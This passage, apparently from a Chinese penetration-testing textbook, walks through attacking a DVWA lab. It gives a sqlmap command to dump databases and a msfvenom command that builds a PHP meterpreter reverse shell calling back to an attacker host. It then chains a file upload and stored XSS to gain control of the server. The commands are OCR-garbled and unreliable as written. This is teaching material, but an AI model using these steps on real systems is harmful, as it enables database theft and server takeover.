然后利用前面的内容构造如下命令:
http://192. 168, 157, 144/dvwa/vulnerbilities/sq11/71d-16aubmit-submit"
--cookie-"security=low: PHPSESSID-b523(41bb19ecca9a1d0b2b90fecc09b" --dbs --batch启动sqlmap之后的使用界面如所示。启动sqlmap之后的使用界面,执行该命令可以显示Web服务器系统中数据库里的内容,如图所示。这样一来,整个数据库中的信息就都暴露给攻击者了。除此之外,攻击者甚至可以将这个跨站漏洞和上传漏洞相结合,实现对整个服务器的控制。首先准备好要上传到Web服务器的恶意PHP文件,这里我们还是使用msfvenom命令,然后将生成的PHP代码保存在一个文本文件中,将其命名为shell.php。执行以下命令之后就会生成一个shell.php文件,如图4-87所示,该文件位于var目录中。msfvenom -p php/meterpreter/reverse_tcp 1host=192.168.157.130 1port-4444-f raw-o/root/shell.php
然后我们切换到DVWA中的File Upload界面,在这个界面单击Browse按钮切换到root目录,然后选中shell.php文件并上传,如下所示。
生成一个shell.php,切换到上传漏洞页面,接着在Metasploit中启动这个木马文件对应的主控端handler,启动的方法和之前的一样,启动之后。接下来我们只需要利用跨站漏洞来提交一段执行木马的脚本,但是这里有一个问题就是当前Message文本框的长度不足以插入一个较长的脚本,需要在该文本框上单击風标右键然后选择“Inspect Element(Q)”选项来查看页面的代码,如下所示。
在Metasploit中打开的handler下面就是这个文本框的静态代码,我们将里面的maxlength的值从50修改为500。修改 Message 文本框长度,现在我们已经修改了文本框的大小,接下来向其中输入下面的脚本。
这个脚本包含了刚刚上传的木马文件所在的目录,当用户查看到我们刚刚提交的脚本之后,这个木马文件shell.php就会执行。在跨站脚本中包含刚上传文件的位置,这个木马文件执行之后,会反向连接到攻击者刚刚启动的handler上,以此获得目标服务器的控制权。现在攻击者已经完全获得了目标服务器的完全控制权,他可以通过获得的Meterpreter来完成几乎所有的渗透操作。例如使用sysinfo查看目标系统的详细信息。